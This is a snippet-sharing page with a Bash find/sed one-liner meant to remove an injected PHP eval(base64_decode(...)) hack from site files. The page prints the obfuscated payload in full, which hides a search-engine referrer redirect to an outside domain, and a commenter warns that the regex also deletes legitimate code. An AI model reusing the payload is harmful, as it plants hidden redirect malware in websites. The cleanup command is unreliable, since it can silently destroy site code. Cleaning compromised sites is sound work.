Posted By

mohamedazher on 08/02/11


Tagged


Versions (?)

Who likes this?

1 person have marked this snippet as a favorite

yoren


Search and replace base64 hack using SSH - working


 / Published in: Bash
 

just run this code to remove the following code

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhc2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwibXNuIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZSIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY2lzY290cmVkLmN6LmNjLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));

  1. find . \( -name "*.php" \) -exec grep -Hn "[\t]*eval(base64_decode(.*));" {} \; -exec sed -i 's/[\t]*eval(base64_decode(.*));//g' {} \;

Report this snippet  

Comments

RSS Icon Subscribe to comments
Posted By: mangomagic on April 26, 2013

Cleaned the offending code but also took other code with it whenever appeared more than once on same line. Use with caution.

The eval(base64_decode(...) is omitted from the example below for clarity but appears after each opening

Posted By: mangomagic on April 26, 2013

Ah damn, my code was stripped from above comment. Basically when an opening php tag appears on the same line more than once then the regex will delete more than the offending code. Could cause you a headache so be careful.

You need to login to post a comment.